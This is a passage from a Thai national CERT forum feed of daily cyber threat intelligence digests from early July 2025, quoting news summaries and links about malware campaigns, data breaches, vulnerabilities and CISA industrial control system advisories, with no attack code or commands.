        "Attackers are increasingly exploiting Windows shortcut (LNK) files for malware delivery. Our telemetry revealed 21,098 malicious LNK samples in 2023, which surged to 68,392 in 2024. In this article, we present an in-depth investigation of LNK malware, based on analysis of 30,000 recent samples. Windows shortcut files use the .lnk file extension and function as a virtual link that allows people to easily access other files without having to navigate through multiple folders on a Windows host. The flexibility of LNK files makes them a powerful tool for attackers, as they can both execute malicious content and masquerade as legitimate files to deceive victims into unintentionally launching malware."
        https://unit42.paloaltonetworks.com/lnk-malware/
      • ESET Research: Russia’s Gamaredon APT Group Unleashed Spearphishing Campaigns Against Ukraine With An Evolved Toolset
        "ESET Research has released a white paper about Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed across the previous year. Gamaredon, attributed by the Security Service of Ukraine (SSU) to the 18th Center of Information Security of Russia’s Federal Security Service (FSB), has targeted Ukrainian governmental institutions since at least 2013. In 2024, Gamaredon exclusively attacked Ukrainian institutions. ESET’s latest research shows that the group remains highly active, consistently targeting Ukraine, but has notably adapted its tactics and tools. The group’s objective is cyberespionage aligned with Russian geopolitical interests. Last year, the group significantly increased the scale and frequency of spearphishing campaigns, employing new delivery methods, and one attack payload was used solely to spread Russian propaganda."
        https://www.eset.com/us/about/newsroom/research/eset-research-russias-gamaredon-apt-group-unleashed-spearphishing-campaigns-against-ukraine-with-an-evolved-toolset/
        https://www.welivesecurity.com/en/eset-research/gamaredon-2024-cranking-out-spearphishing-campaigns-ukraine-evolved-toolset/
        https://web-assets.esetstatic.com/wls/en/papers/white-papers/gamaredon-in-2024.pdf
        https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-gamaredon-ukraine-phishing

      Breaches/Hacks/Leaks

      • US Calls Reported Threats By Pro-Iran Hackers To Release Trump-Tied Material a ‘Smear Campaign’
        "Pro-Iran hackers have threatened to release emails supposedly stolen from people connected to President Donald Trump, according to a news report, a move that federal authorities call a “calculated smear campaign.” The United States has warned of continued Iranian cyberattacks following American strikes on Iran’s nuclear facilities and the threats those could pose to services, economic systems and companies. The Cybersecurity and Infrastructure Security Agency said late Monday that the threat to expose emails about Trump is “nothing more than digital propaganda” meant to damage Trump and other federal officials."
        https://www.securityweek.com/us-calls-reported-threats-by-pro-iran-hackers-to-release-trump-tied-material-a-smear-campaign/
      • Medical Device Company Surmodics Reports Cyberattack, Says It’s Still Recovering
        "Minnesota-based company Surmodics said a cyberattack on June 5 forced the medical device manufacturer to shut down parts of its IT system. Surmodics is the largest U.S. provider of outsourced hydrophilic coatings used to reduce friction for objects such as intravascular medical devices. Last month its IT team discovered unauthorized access in its network and took systems offline, while using alternative methods to accept customer orders and ship products. Law enforcement has been notified, according to a filing with the U.S. Securities and Exchange Commission (SEC)."
        https://therecord.media/surmodics-medical-device-company-reports-cybersecurity-incident
      • Hacker With ‘political Agenda’ Stole Data From Columbia, University Says
        "A hacktivist with a “political agenda” broke into Columbia University IT systems and stole “targeted” student data in recent weeks, a university official said Tuesday. It is unclear how long the hacker was in university systems but a Columbia spokesperson said there has been no threat activity detected since June 24. Last week, the school said it was investigating a cyberattack and the university’s website and other systems were intermittently offline. “Our investigation has indicated the hackers are highly sophisticated and were very targeted in their theft of documents,” the university official said. “They broke in and stole student data with the apparent goal of furthering their political agenda.”"
        https://therecord.media/hacker-political-agenda-columbia-cyberattack
      • Ransomware Gang Attacks German Charity That Feeds Starving Children
        "Deutsche Welthungerhilfe (WHH), the German charity that aims to develop sustainable food supplies in some of the world’s most impoverished countries, has been attacked by a ransomware gang. The charity, whose name literally translates as World Hunger Help, reached 16.4 million people in 2023. It is currently providing emergency aid to people in Gaza, Ukraine, Sudan and other countries and regions where there is an urgent need for food, water, medicine and basic necessities. A spokesperson confirmed to Recorded Future News that WHH had been targeted by a ransomware-as-a-service (RaaS) group which recently listed the charity on its darknet leak site."
        https://therecord.media/welthungerhilfe-german-hunger-relief-charity-ransomware-attack
      • Hacktivists' Claimed Breach Of Nuclear Secrets Debunked
        "Security experts are dismissing a pro-Iranian hacktivist group's claim to have breached Indian nuclear secrets in reprisal for the country's support of Israel. The LulzSec Black group last week claimed to have hacked "the company responsible for Indian nuclear reactors" and to have stolen 80 databases, of which it was now selling 17 databases containing 5.2 gigabytes of data. The group claimed the information detailed the precise location of India's nuclear reactors, numerous chemical laboratories, employee personally identifiable information, industrial and engineering information, precise details of guard shifts and "other sensitive data related to infrastructure.""
        https://www.bankinfosecurity.com/hacktivists-claimed-breach-nuclear-secrets-debunked-a-28881

      General News

      • Cybersecurity Essentials For The Future: From Hype To What Works
        "Cybersecurity never stands still. One week it’s AI-powered attacks, the next it’s a new data breach, regulation, or budget cut. With all that noise, it’s easy to get distracted. But at the end of the day, the goal stays the same: protect the business. CISOs are being asked to juggle more, with tighter resources, more boardroom time, and threats that keep changing. Here are five areas that deserve your attention now and going forward."
        https://www.helpnetsecurity.com/2025/07/02/cybersecurity-essentials-best-practices/
      • Scammers Are Trick­ing Travelers Into Booking Trips That Don’t Exist
        "Not long ago, travelers worried about bad weather. Now, they’re worried the rental they booked doesn’t even exist. With AI-generated photos and fake reviews, scammers are creating fake listings so convincing, people are losing money before they even pack a bag. The FTC reported that Americans lost $274 million to vacation and travel fraud in 2024."
        https://www.helpnetsecurity.com/2025/07/02/ai-travel-scams/
      • DOJ Investigates Ex-Ransomware Negotiator Over Extortion Kickbacks
        "An ex-ransomware negotiator is under criminal investigation by the Department of Justice for allegedly working with ransomware gangs to profit from extortion payment deals. The suspect is a former employee of DigitalMint, a Chicago-based incident response and digital asset services company that specializes in ransomware negotiation and facilitating cryptocurrency payments to receive a decryptor or prevent stolen data from being publicly released. The company claims to have conducted over 2,000 ransomware negotiations since 2017. Bloomberg first reported that the DOJ is investigating whether the suspect worked with ransomware gangs to negotiate payments, then allegedly received a cut of the ransom that was charged to the customer."
        https://www.bleepingcomputer.com/news/security/doj-investigates-ex-ransomware-negotiator-over-extortion-kickbacks/
      • Spain Arrests Hackers Who Targeted Politicians And Journalists
        "The Spanish police have arrested two individuals in the province of Las Palmas for their alleged involvement in cybercriminal activity, including data theft from the country's government. The duo has been described as a "serious threat to national security" and focused their attacks on high-ranking state officials as well as journalists. They leaked samples of the stolen data online to build notoriety and inflate the selling price. "The investigation began when agents detected the leakage of personal data affecting high-level institutions of the State across various mass communication channels and social networks," reads the police announcement."
        https://www.bleepingcomputer.com/news/security/spain-arrests-hackers-who-targeted-politicians-and-journalists/
        https://therecord.media/spain-arrests-two-data-leaks-targeting-gov-officials-journalists
      • Spain TLD’s Recent Rise To Dominance
        "Threat actors use various Top-Level Domains (TLDs) to host malicious content and serve as Command and Control (C2) locations. Commonly abused TLDs used to host credential phishing include .ru and .com. More recently, Cofense Intelligence detected a meteoric increase in abuse of the .es TLD for malicious activity. From Q4 2024 to Q1 2025, .es TLD abuse increased 19x and became part of the top 10 abused TLDs in credential phishing. This increase applies to both first-stage URLs (links embedded in emails or attachments) and second-stage URLs (sites visited after the embedded URLs). These second-stage URLs typically host credential phishing pages or exfiltrate information. It is these second-stage URLs that have seen the greatest increase in .es TLD abuse."
        https://cofense.com/blog/spain-tld-s-recent-rise-to-dominance
      • 1 Year Later: Lessons Learned From The CrowdStrike Outage
        "One year after a buggy CrowdStrike update knocked IT systems offline, organizations seeking to strike the right balance between security and productivity have viewed the incident as a learning opportunity. The cost of the CrowdStrike outage was estimated at $5.4 billion, affecting payment systems, airline reservations, and a variety of other industries. The impact of the outage highlights why many operational technology (OT) teams are as sensitive to patches and other updates in their critical infrastructure, as they are highly averse to outages that can happen if such updates are defective."
        https://www.darkreading.com/vulnerabilities-threats/1-year-later-lessons-crowdstrike-outage
      • Rethinking Cyber-Risk As Traditional Models Fall Short
        "Rapidly advancing technology, increasingly sophisticated attackers, and a rise in supply chain threats make systemic cyber-risk difficult to assess. An influx of vulnerabilities that continue to amass each year, paired with faster exploit times, doesn't help. Risk models developed to measure systemic cyber-risk can help organizations determine the likelihood of a disruptive attack and expose security holes. Insurers use modeling to assess systemic cyber-risk, which influences underwriting, coverage, and policy pricing decisions."
        https://www.darkreading.com/cyber-risk/rethinking-cyber-risk-traditional-models-fall-short
      • Like Ransoming a Bike: Organizational Muscle Memory Drives The Most Effective Response
        "Ransomware has become an enterprise boogeyman experiencing 37 percent increase over 2024 according to the Verizon Data Breach Investigations Report (PDF), being present in nearly half of all breaches. It would seem that resistance is futile as all the technology and training put in place fail to repel attacks, and all the best practices in backups and redundancy provide only cold comfort. But in the old joke of a tiger pursuing two friends, there are lessons in survivability that translate in a business context. However, in this context It’s not just being the faster friend, it’s organizational athleticism and muscle memory fostering agility and quick, decisive thinking that can make a massive difference in impact. And as with athletic performance, that muscle memory is earned with proper training, form, and practice."
        https://www.securityweek.com/like-ransoming-a-bike-organizational-muscle-memory-drives-the-most-effective-response/
      • That Network Traffic Looks Legit, But It Could Be Hiding a Serious Threat
        "Where do you turn when firewalls and endpoint detection and response (EDR) fall short at detecting the most important threats to your organization? Breaches at edge devices and VPN gateways have risen from 3% to 22%, according to Verizon's latest Data Breach Investigations report. EDR solutions are struggling to catch zero-day exploits, living-off-the-land techniques, and malware-free attacks. Nearly 80% of detected threats use malware-free techniques that mimic normal user behavior, as highlighted in CrowdStrike's 2025 Global Threat Report. The stark reality is that conventional detection methods are no longer sufficient as threat actors adapt their strategies, using clever techniques like credential theft or DLL hijacking to avoid discovery."
        https://thehackernews.com/2025/07/that-network-traffic-looks-legit-but-it.html

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) 51d6c0c0-666c-4e35-b278-36df6740f549-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 7 รายการ

      Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 7 รายการ เมื่อวันที่ 2 กรกฎาคม 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้

      • ICSA-25-182-01 FESTO Didactic CP, MPS 200, and MPS 400 Firmware
      • ICSA-25-182-02 FESTO Automation Suite, FluidDraw, and Festo Didactic Products
      • ICSA-25-182-03 FESTO CODESYS
      • ICSA-25-182-04 FESTO Hardware Controller, Hardware Servo Press Kit
      • ICSA-25-182-05 Voltronic Power and PowerShield UPS Monitoring Software
      • ICSA-25-182-06 Hitachi Energy Relion 670/650 and SAM600-IO Series
      • ICSA-25-182-07 Hitachi Energy MSM

      ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-releases-seven-industrial-control-systems-advisories

      อ้างอิง
      https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-releases-seven-industrial-control-systems-advisories
      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 39cc33b7-071b-4233-ae19-563e2fa055cf-image.png

      โพสต์ใน OT Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cyber Threat Intelligence 02 July 2025

      Energy Sector

      • Protecting The Core: Securing Protection Relays In Modern Substations
        "Substations are critical nexus points in the power grid, transforming high-voltage electricity to ensure its safe and efficient delivery from power plants to millions of end-users. At the core of a modern substation lies the protection relay: an intelligent electronic device (IED) that plays a critical role in maintaining the stability of the power grid by continuously monitoring voltage, current, frequency, and phase angle. Upon detecting a fault, it instantly isolates the affected zone by tripping circuit breakers, thus preventing equipment damage, fire hazards, and cascading power outages."
        https://cloud.google.com/blog/topics/threat-intelligence/securing-protection-relays-modern-substations

      Industrial Sector

      • FESTO Didactic CP, MPS 200, And MPS 400 Firmware
        "Successful exploitation of this vulnerability could allow an attacker to write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-01
      • FESTO Automation Suite, FluidDraw, And Festo Didactic Products
        "Successful exploitation of these vulnerabilities could allow an attacker to gain full control of the host system, including remote code execution."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-02
      • FESTO CODESYS
        "Successful exploitation of these vulnerabilities could allow an attacker to block legitimate user connections, crash the application, or authenticate without proper credentials."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-03
      • FESTO Hardware Controller, Hardware Servo Press Kit
        "Successful exploitation of these vulnerabilities could allow an attacker to execute unauthorized system commands with root privileges."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-04
      • Voltronic Power And PowerShield UPS Monitoring Software
        "Successful exploitation of these vulnerabilities could allow an unauthenticated attacker remotely to make configuration changes, resulting in shutting down UPS connected devices or execution of arbitrary code."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-05
      • Hitachi Energy Relion 670/650 And SAM600-IO Series
        "Successful exploitation of this vulnerability could allow attackers to cause a denial-of-service that disrupts critical functions in the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-06
      • Hitachi Energy MSM
        "Successful exploitation of this vulnerability could allow attackers to execute untrusted code, potentially leading to unauthorized actions or system compromise."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07

      Vulnerabilities

      • Critical RCE Vulnerability In Anthropic MCP Inspector - CVE-2025-49596
        "Oligo Security Research reported a Remote Code Execution (RCE) vulnerability and DNS rebinding in the MCP Inspector project to Anthropic, leading to CVE-2025-49596 being issued, with a Critical CVSS Score of 9.4. This is one of the first critical RCEs in Anthropic’s MCP ecosystem, exposing a new class of browser-based attacks against AI developer tools. With code execution on a developer’s machine, attackers can steal data, install backdoors, and move laterally across networks - highlighting serious risks for AI teams, open-source projects, and enterprise adopters relying on MCP. When a victim visits a malicious website, the vulnerability allows attackers to run arbitrary code on the visiting host running the official MCP inspector tool that is used by default in many use cases."
        https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
        https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html
      • Chrome Zero-Day, 'FoxyWallet' Firefox Attacks Threaten Browsers
        "Both the Google Chrome and Mozilla Firefox browsers currently are under separate attacks, the former from actors exploiting a zero-day bug and the latter from a list of malicious extensions that are actively compromising users. Google rushed out a stable channel update on Monday to patch the fourth zero-day flaw found in its browser this year, a high-severity type confusion flaw tracked as CVE-2025-6554, according to a Google security advisory. The flaw, which allows attackers to execute arbitrary code, is under active exploitation and should be patched immediately. Meanwhile, 45 malicious Firefox extensions impersonating legitimate cryptocurrency wallet add-ons are targeting Mozilla Firefox users, compromising their client devices."
        https://www.darkreading.com/cyberattacks-data-breaches/browsers-targeted-chrome-zero-day-malicious-firefox-extensions
        https://www.bleepingcomputer.com/news/security/google-fixes-fourth-actively-exploited-chrome-zero-day-of-2025/
        https://thehackernews.com/2025/07/google-patches-critical-zero-day-flaw.html
        https://www.securityweek.com/chrome-138-update-patches-zero-day-vulnerability/
        https://www.helpnetsecurity.com/2025/07/01/google-patches-actively-exploited-chrome-cve-2025-6554/
        https://www.infosecurity-magazine.com/news/google-patch-chrome-zero-day/
        https://www.malwarebytes.com/blog/news/2025/07/update-your-chrome-to-fix-new-actively-exploited-zero-day-vulnerability
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-48927 TeleMessage TM SGNL Initialization of a Resource with an Insecure Default Vulnerability
        CVE-2025-48928 TeleMessage TM SGNL Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/07/01/cisa-adds-two-known-exploited-vulnerabilities-catalog
      • Sudo Local Privilege Escalation Vulnerabilities Fixed (CVE-2025-32462, CVE-2025-32463)
        "If you haven’t recently updated the Sudo utility on your Linux box(es), you should do so now, to patch two local privilege escalation vulnerabilities (CVE-2025-32462, CVE-2025-32463) that have been disclosed on Monday. Sudo is command-line utility in Unix-like operating systems that allows a low-privilege user to execute a command as another user, typically the root/administrator user. The utility effectively grants temporary elevated privileges without requiring the user to log in as root."
        https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/
      • Can You Trust That Verified Symbol? Exploiting IDE Extensions Is Easier Than It Should Be
        "Integrated Development Environments (IDEs) play a major role in today’s programming landscape. They provide comprehensive environments in which programmers can write, test, and debug code efficiently. However, OX’s research, conducted in May and June 2025, reveals critical security vulnerabilities in how popular IDEs handle extension verification. IDEs typically include basic built-in functionality, but their capabilities extend through a wide range of third-party extensions available on marketplaces and external websites. This means that any risk in the IDE could result in far-reaching consequences."
        https://www.ox.security/can-you-trust-that-verified-symbol-exploiting-ide-extensions-is-easier-than-it-should-be/
        https://thehackernews.com/2025/07/new-flaw-in-ides-like-visual-studio.html

      Malware

      • How Analyzing 700,000 Security Incidents Helped Our Understanding Of Living Off The Land Tactics
        "This article shares initial findings from internal Bitdefender Labs research into Living off the Land (LOTL) techniques. Our team at Bitdefender Labs, comprised of hundreds of security researchers with close ties to academia, conducted this analysis as foundational research during the development of our GravityZone Proactive Hardening and Attack Surface Reduction (PHASR) technology. The results reveal adversaries’ persistent and widespread use of trusted system tools in most significant security incidents. While this research was primarily for our internal development efforts, we believe these initial insights from Bitdefender Labs are valuable for broader understanding and we are sharing them now, ahead of a more comprehensive report."
        https://www.helpnetsecurity.com/2025/07/01/bitdefender-lotl-security-incidents-phasr/
      • FileFix (Part 2)
        "While analyzing Chrome & MS Edge’s behavior, I made an interesting observation. When an HTML page is saved using Ctrl+S or Right-click > “Save as” and either “Webpage, Single File” or “Webpage, Complete” types were selected, then the file downloaded does not have MOTW. Furthermore, this behaviour only applies if the webpage being saved has a MIME type of text/html or application/xhtml+xml. Other MIME types will result in the file being tagged with MOTW (e.g. image/png, image/svg+xml etc.)"
        https://mrd0x.com/filefix-part-2/
        https://www.bleepingcomputer.com/news/security/new-filefix-attack-runs-jscript-while-bypassing-windows-motw-alerts/
      • Stealthy WordPress Malware Drops Windows Trojan Via PHP Backdoor
        "Last month, we encountered a particularly interesting and complex malware case that stood out from the usual infections we see in compromised WordPress websites. At first glance, the site looked clean, no visible signs of defacement, no malicious redirects, and nothing suspicious in the plugin list. But beneath the surface, a hidden infection chain was quietly working to deliver a trojan to unsuspecting visitors. It was a layered attack involving PHP-based droppers, obfuscated code, IP-based evasion, auto-generated batch scripts, and a malicious ZIP archive containing a Windows-based trojan (client32.exe)."
        https://blog.sucuri.net/2025/06/stealthy-wordpress-malware-drops-windows-trojan-via-php-backdoor.html

      Breaches/Hacks/Leaks

      • Kelly Benefits Says 2024 Data Breach Impacts 550,000 Customers
        "Kelly & Associates Insurance Group (dba Kelly Benefits) is informing more than half a million people of a data breach that compromised their personal information. The Maryland-based health and life insurance agency has issued an update on a security incident it suffered last year between December 12-17, when unauthorized actors breached its IT systems and stole files. On April 9, 2025, the company stated that the incident impacted 32,234 individuals. The figure was revised multiple times until the final tally shared with authorities in the U.S. counted 553,660 individuals."
        https://www.bleepingcomputer.com/news/security/kelly-benefits-says-2024-data-breach-impacts-550-000-customers/
      • Esse Health Says Recent Data Breach Affects Over 263,000 Patients
        "Esse Health, a healthcare provider based in St. Louis, Missouri, is notifying over 263,000 patients that their personal and health information was stolen in an April cyberattack. As the largest independent physicians' group in the Greater St. Louis area, Esse Health operates 50 locations and employs over 100 physicians. The organization was made aware of a breach after the attackers took down some primary patient-facing network systems and its phone systems on April 21."
        https://www.bleepingcomputer.com/news/security/esse-health-says-recent-data-breach-affects-over-263-000-patients/
        https://www.securityweek.com/263000-impacted-by-esse-health-data-breach/
        https://securityaffairs.com/179520/data-breach/esse-health-data-breach-impacted-263000-individuals.html
      • Qantas Discloses Cyberattack Amid Scattered Spider Aviation Breaches
        "Australian airline Qantas disclosed that it detected a cyberattack on Monday after threat actors gained access to a third-party platform containing customer data. Qantas is Australia's largest airline, operating domestic and international flights across six continents and employing around 24,000 people. In a press release issued Monday night, the airline states that the attack has been contained, but a "significant" amount of data is believed to have been stolen. The breach began after a threat actor targeted a Qantas call centre and gained access to a third-party customer servicing platform."
        https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/
        https://www.itnews.com.au/news/qantas-facing-significant-data-theft-after-cyber-attack-618367
        https://www.theregister.com/2025/07/02/qantas_data_theft/

      General News

      • How Cybercriminals Are Weaponizing AI And What CISOs Should Do About It
        "In a recent case tracked by Flashpoint, a finance worker at a global firm joined a video call that seemed normal. By the end of it, $25 million was gone. Everyone on the call except the employee was a deepfake. Criminals had used AI-powered cybercrime tactics to impersonate executives convincingly enough to get the payment approved. Threat actors are building LLMs specifically for fraud and cybercrime. These are trained on stolen credentials, scam scripts, and hacking guides. Some generate phishing emails or fake invoices, others explain how to use malware or cash out stolen data, according to the AI and Threat Intelligence report from Flashpoint."
        https://www.helpnetsecurity.com/2025/07/01/defending-ai-powered-cybercrime/
      • GenAI Is Everywhere, But Security Policies Haven’t Caught Up
        "Nearly three out of four European IT and cybersecurity professionals say staff are already using generative AI at work, up ten points in a year, but just under a third of organizations have put formal policies in place, according to new ISACA research. The use of AI is becoming more prevalent within the workplace, and so regulating its use is best practice. Yet 31% of organizations have a formal, comprehensive AI policy in place, highlighting a disparity between how often AI is used versus how closely it’s regulated in workplaces."
        https://www.helpnetsecurity.com/2025/07/01/ai-work-policies-europe/
      • Federal Reserve System CISO On Aligning Cyber Risk Management With Transparency, Trust
        "In this Help Net Security interview, Tammy Hornsby-Fink, CISO at Federal Reserve System, shares how the Fed approaches cyber risk with a scenario-based, intelligence-driven strategy. She explains how the Fed assesses potential disruptions to financial stability and addresses third-party and cloud service risks. Hornsby-Fink also discusses how federal collaboration supports managing systemic threats and strengthens operational resilience."
        https://www.helpnetsecurity.com/2025/07/01/tammy-hornsby-fink-federal-reserve-system-cyber-risk/
      • Scam Centers Are Spreading, And So Is The Human Cost
        "Human trafficking tied to online scam centers is spreading across the globe, according to a new crime trend update from INTERPOL. By March 2025, people from 66 countries had been trafficked into these scam operations, with every continent affected. INTERPOL found that 74% of victims were taken to scam centers in Southeast Asia, the original hotspot for this type of crime. But these centers are now also showing up in other regions, including the Middle East, West Africa, which may be turning into a new hub, and Central America. Most of the traffickers, around 90%, came from Asia. Another 11% were from South America or Africa."
        https://www.helpnetsecurity.com/2025/07/01/interpol-human-trafficking-scam-centers/
        https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
      • Terrible Tales Of Opsec Oversights: How Cybercrooks Get Themselves Caught
        "They say that success breeds complacency, and complacency leads to failure. For cybercriminals, taking too many shortcuts when it comes to opsec delivers a little more than that. In these cases, failure might mean the criminal doesn't get access to the server with the most valuable data to copy, or fails to trick any of the victim org's staff members to execute a malicious remote access tool. Complacency, however, can get them caught, and all too often we hear about highly skilled individuals taking one too many shortcuts – the type that leads police to their doors."
        https://www.theregister.com/2025/07/01/terrible_tales_of_opsec_oversights/
      • Treasury Sanctions Global Bulletproof Hosting Service Enabling Cybercriminals And Technology Theft
        "Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) is designating Aeza Group, a bulletproof hosting (BPH) services provider, for its role in supporting cybercriminal activity targeting victims in the United States and around the world. BPH service providers sell access to specialized servers and other computer infrastructure designed to help cybercriminals like ransomware actors, personal information stealers, and drug vendors evade detection and resist law enforcement attempts to disrupt their malicious activities. OFAC is also designating two affiliated companies and four individuals who are Aeza Group leaders. Finally, in coordination with the United Kingdom’s (UK) National Crime Agency (NCA), OFAC is designating an Aeza Group front company in the UK."
        https://home.treasury.gov/news/press-releases/sb0185
        https://www.bleepingcomputer.com/news/security/aeza-group-sanctioned-for-hosting-ransomware-infostealer-servers/
        https://therecord.media/russia-bulletproof-hosting-aeza-group-us-sanctions
        https://www.bankinfosecurity.com/us-sanctions-aeza-group-for-hosting-infostealers-ransomware-a-28871
        https://cyberscoop.com/bulletproof-hosting-provider-aezagroup-sanctions/
      • Top Ransomware Groups June 2025: Qilin Reclaims Top Spot
        "Qilin was the top ransomware group for the second time in three months in June, suggesting that the group may be strongly benefiting from the turmoil that knocked RansomHub offline at the beginning of April. RansomHub was the top ransomware group for more than a year until rival DragonForce claimed to be taking over its infrastructure in what may have been an act of sabotage. Qilin took over the top spot in April, and after SafePay narrowly took the lead in May, Qilin returned to the top in June with a dominant showing."
        https://cyble.com/blog/top-ransomware-groups-june-2025-qilin-top-spot/
      • Like SEO, LLMs May Soon Fall Prey To Phishing Scams
        "Just as attackers have exploited search engine optimization (SEO) techniques to push phishing content in search engine results, expect to soon see them leverage AI-optimized content to influence the outputs of large language models (LLMs) for the same purpose. Making the task possible for them is the tendency by LLMs to often return incorrect domain information in response to simple natural language queries, according to a recent experiment by Netcraft."
        https://www.darkreading.com/cyber-risk/seo-llms-fall-prey-phishing-scams
      • Ransomware Reshaped How Cyber Insurers Perform Security Assessments
        "The ransomware scourge has forced cyber insurers to re-examine how they use security assessments. While the threat has been around for years, it's only fairly recently that cybercriminals realized how profitable ransomware attacks could be. As ransomware-as-a-service and double extortion tactics started to emerge, the threat landscape has shifted immensely, with more and more organizations seeing their data splashed online for all to see, acommpanied with payment countdown clocks. Cyber insurance helped organizations address the ransomware threat by providing services such as ransom reimbursement, incident response, and ransom negotiation. But that support came with a price, as policies and premiums fluctuated. In fact, insurance premiums surged in 2020 and 2021."
        https://www.darkreading.com/cybersecurity-operations/ransomware-reshaped-how-cyber-insurers-perform-security-assessments
      • We've All Been Wrong: Phishing Training Doesn't Work
        "A recent study suggests, contrary to popular belief, that most phishing awareness initiatives aren't having a material impact on employee cybersecurity. One of the most widely repeated, least examined memes in the cybersecurity industry is that, even more than technical solutions, organizations can best secure themselves by teaching cyber awareness among their employees. Building a "human firewall," to protect an organization's otherwise "weakest link.""
        https://www.darkreading.com/endpoint-security/phishing-training-doesnt-work
      • How Businesses Can Align Cyber Defenses With Real Threats
        "With escalating geopolitical tensions and highly publicized cyberattacks on critical infrastructure like Change Healthcare and Colonial Pipeline, businesses worldwide are grappling with increasingly sophisticated cybercriminal tactics. Cybercriminal groups are quickly adopting the highly complex tactics once limited to the most advanced state-backed operations. In parallel, heavily sanctioned nation-states are increasingly using ransomware and cryptocurrency scams through state backed threat actors to finance their regimes."
        https://www.darkreading.com/vulnerabilities-threats/how-businesses-can-align-cyber-defenses-real-threats
      • Crypto Hack Losses In First Half Of 2025 Exceed 2024 Total
        "Around $2.47bn in cryptocurrency has been stolen via scams, hacks and exploits in H1 2025, already exceeding the total amount lost during 2024, new data from CertiK has revealed. The surge in crypto losses in 2025 is largely the result of two major security incidents – the ByBit breach and Cetus Protocol incident. Collectively, these incidents cost $1.78bn, 72% of the total. In the ByBit incident, hackers stole $1.4bn in cryptocurrency from the Dubai-based exchange in February 2025. The notorious North Korean state actor Lazarus group is suspected of carrying out the Ethereum attack, which is the largest ever crypto theft to date."
        https://www.infosecurity-magazine.com/news/crypto-hack-losses-half-exceed-2024/
      • Cyberattack On Russian Independent Media Had Links To US-Sanctioned Institute, Researchers Find
        "A Russian hosting provider allegedly involved in a recent cyberattack against independent media organizations in the country is reportedly connected to a state-affiliated research center sanctioned by the U.S., according to new research. The hosting provider, Biterika, generated one-third of the junk traffic that flooded the websites of IStories and Verstka after they published an exposé on a child sex trafficking network in Russia that allegedly involved oligarchs and other powerful figures."
        https://therecord.media/cyberattack-on-russian-media-linked-to-sanctioned-institute
      • How To Build An Effective Security Awareness Program
        "Organizations invest in advanced tools to secure their assets, but humans are still the most persistent attack vector. Each year, this is reinforced by the overwhelming number of breaches that stem from human behaviour. Ultimately, employees are being asked to be hypervigilant all the time – despite their best efforts, everybody makes mistakes, and you can’t defend what you don’t know. By building a strong security awareness and training program, you can help your employees become your first line of defense against cyberattacks."
        https://www.trendmicro.com/en_us/research/25/f/security-awareness-program.html
      • Out-Of-Band, Part 1: The New Generation Of IP KVMs And How To Find Them
        "Welcome to the first post in Out-of-Band, a series exploring the security risks of out-of-band (OoB) management devices like baseboard management controllers, serial console servers, and IP-enabled KVMs. These tools often have weaker security than the systems they control, offering attackers a path to bypass monitoring and safeguards. In this installment, we focus on the latest wave of open-source, network-connected KVMs. We’ll cover where to find them in the wild, how to detect them via network and host signals (plus SIEM), and what their source code reveals about their security posture. Bonus: These devices have been used by North Korean threat actors to spoof in-country access. So if that’s a concern, read on."
        https://www.runzero.com/blog/oob-p1-ip-kvm/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) db824815-672e-41e2-95c6-dcd9651dbc5d-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Cyber Threat Intelligence 01 July 2025

      New Tooling

      • RIFT: New Open-Source Tool From Microsoft Helps Analyze Rust Malware
        "Microsoft’s Threat Intelligence Center has released a new tool called RIFT to help malware analysts identify malicious code hidden in Rust binaries. While Rust is becoming more popular for its speed and memory safety, those same qualities make malware written in Rust harder to analyze. RIFT is designed to cut through that complexity and make the job easier."
        https://www.helpnetsecurity.com/2025/06/30/rift-open-source-microsoft-tool-analyze-rust-malware/
        https://github.com/microsoft/RIFT

      Vulnerabilities

      • Over 1,200 Citrix Servers Unpatched Against Critical Auth Bypass Flaw
